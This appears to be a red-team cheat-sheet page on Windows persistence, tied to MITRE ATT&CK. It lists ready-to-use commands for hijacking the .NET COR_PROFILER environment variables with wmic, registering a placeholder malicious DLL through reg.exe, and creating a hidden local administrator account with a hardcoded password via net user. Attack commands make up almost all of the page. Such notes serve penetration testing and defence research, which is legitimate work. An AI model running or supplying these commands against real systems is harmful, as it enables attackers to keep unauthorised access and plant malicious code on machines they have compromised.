Persistence

The adversary is trying to maintain their foothold. https://attack.mitre.org/tactics/TA0003/

COR Profiler Variable Hijack

Source: https://www.picussecurity.com/resource/blog/t1047-windows-management-instrumentation-of-the-mitre-attack-framework

# deleting existing COR_PROFILER variable
wmic ENVIRONMENT where "name='COR_PROFILER'" delete

# creating COR_ENABLE_PROFILING variable and setting it to 1
wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="<system>",VariableValue="1"

# creating a new COR_PROFILER variable
wmic ENVIRONMENT create name="COR_PROFILER",username="<system>",VariableValue="<arbitrary CLSID>"

# adding registry keys for malicious DLL
reg.exe add HKLM\Software\Classes\CLSID\<arbitrary CLSID>\InProcServer32 /V ThreadingModel /T REG_SZ /D Apartment /F
reg.exe add HKLM\Software\Classes\CLSID\<arbitrary CLSID>\InProcServer32 /VE /T REG_SZ /D "<malicious_DLL>" /F

Local Administrator Account Creation

net user burmat BURMAT123123123 /add
net localgroup administrators burmat /add 
net localgroup administrators

Last updated